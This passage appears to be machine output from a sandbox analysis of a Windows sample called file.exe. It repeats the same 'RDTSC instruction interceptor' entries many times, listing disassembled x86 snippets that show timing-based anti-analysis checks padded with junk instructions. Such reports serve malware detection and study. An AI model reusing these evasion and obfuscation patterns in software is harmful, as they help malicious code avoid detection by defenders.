              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CDC second address: 906D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F92851B8962h 0x0000000c jnp 00007F92851B8952h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D0C second address: 906D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906EA7 second address: 906EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EA06 second address: 90EA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CB80 second address: 90CB98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F92851B8946h 0x0000000d jo 00007F92851B8946h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CB98 second address: 90CBAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 ja 00007F9284AFDC92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBAD second address: 90CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F92851B8946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B8956h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F92851B8946h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBDB second address: 90CBE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBE1 second address: 90CBEB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F92851B894Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D017 second address: 90D02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D02D second address: 90D031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D031 second address: 90D039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D039 second address: 90D047 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F92851B8946h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D047 second address: 90D04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D37F second address: 90D389 instructions: 0x00000000 rdtsc 0x00000002 je 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D929 second address: 90D978 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9284AFDC9Eh 0x00000008 ja 00007F9284AFDC9Fh 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F9284AFDC97h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jnl 00007F9284AFDC86h 0x00000020 push esi 0x00000021 pop esi 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D978 second address: 90D97D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D97D second address: 90D98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9284AFDC86h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D98E second address: 90D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D992 second address: 90D996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DED1 second address: 90DED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DED9 second address: 90DEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9284AFDC98h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DEF9 second address: 90DF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B8955h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913F7A second address: 913F85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913F85 second address: 913F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917E51 second address: 917E63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9284AFDC86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917E63 second address: 917E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F92851B8946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917E6F second address: 917E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F9284AFDC95h 0x0000000b jmp 00007F9284AFDC8Fh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917E89 second address: 917E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F92851B8946h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917E93 second address: 917E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917156 second address: 917163 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F92851B8948h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9179DA second address: 9179E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9284AFDC86h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921593 second address: 9215D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B894Fh 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F92851B8950h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F92851B8959h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9215D8 second address: 9215DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9215DC second address: 9215E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9215E2 second address: 9215E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9215E8 second address: 9215FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91FB82 second address: 91FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9284AFDC90h 0x00000009 popad 0x0000000a jmp 00007F9284AFDC8Fh 0x0000000f pushad 0x00000010 jmp 00007F9284AFDC95h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91FE44 second address: 91FE8A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F92851B8959h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F92851B8957h 0x00000012 jmp 00007F92851B894Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91FE8A second address: 91FE8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91FE8F second address: 91FE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920187 second address: 92018D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92018D second address: 920193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920193 second address: 920197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920197 second address: 9201A1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F92851B8946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920418 second address: 92041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920CD4 second address: 920CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920CD8 second address: 920CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9284AFDC98h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920CFA second address: 920CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920CFE second address: 920D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D68 second address: 926D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D6D second address: 926D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926D77 second address: 926D7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926EE1 second address: 926EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926EE5 second address: 926EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F92851B894Dh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9270AB second address: 9270AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9270AF second address: 9270BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F92851B894Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934FE5 second address: 934FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934E29 second address: 934E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934E2D second address: 934E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9284AFDC97h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934E4C second address: 934E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 938F72 second address: 938F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB33 second address: 93EB3D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F92851B8946h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB3D second address: 93EB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948844 second address: 948858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jg 00007F92851B8948h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948858 second address: 94885E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94885E second address: 948891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F92851B8959h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F92851B894Eh 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D314 second address: 94D31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D31A second address: 94D31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9515FA second address: 9515FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9518A7 second address: 9518AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9518AD second address: 9518B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9519FD second address: 951A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951B58 second address: 951B5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951FF3 second address: 951FFD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951FFD second address: 952002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952A00 second address: 952A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964613 second address: 964619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 964619 second address: 964630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F92851B8964h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9755AB second address: 9755AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9755AF second address: 9755CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F92851B894Ch 0x0000000f jo 00007F92851B8946h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9770A9 second address: 9770AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977203 second address: 977210 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9911AE second address: 9911B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9911B2 second address: 9911C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F92851B8946h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9901CD second address: 9901D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990A15 second address: 990A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990A1B second address: 990A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jns 00007F9284AFDC86h 0x00000012 jnc 00007F9284AFDC86h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jp 00007F9284AFDC86h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990A40 second address: 990A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990A46 second address: 990A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990BAB second address: 990BB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F92851B8952h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990BB5 second address: 990BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993D13 second address: 993D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993D8A second address: 993D9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993D9A second address: 993D9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993D9F second address: 993E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dl, D4h 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F9284AFDC88h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F9284AFDC94h 0x0000002b sub dword ptr [ebp+1247C6FBh], eax 0x00000031 xor dword ptr [ebp+12451557h], edi 0x00000037 call 00007F9284AFDC89h 0x0000003c jmp 00007F9284AFDC93h 0x00000041 push eax 0x00000042 pushad 0x00000043 jmp 00007F9284AFDC98h 0x00000048 push esi 0x00000049 jmp 00007F9284AFDC90h 0x0000004e pop esi 0x0000004f popad 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push ecx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996F85 second address: 996F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996F89 second address: 996F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996F8F second address: 996F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996F97 second address: 996F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998BDE second address: 998C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F92851B8952h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F92851B8954h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C13 second address: 998C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C17 second address: 998C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC21D second address: 8AC222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
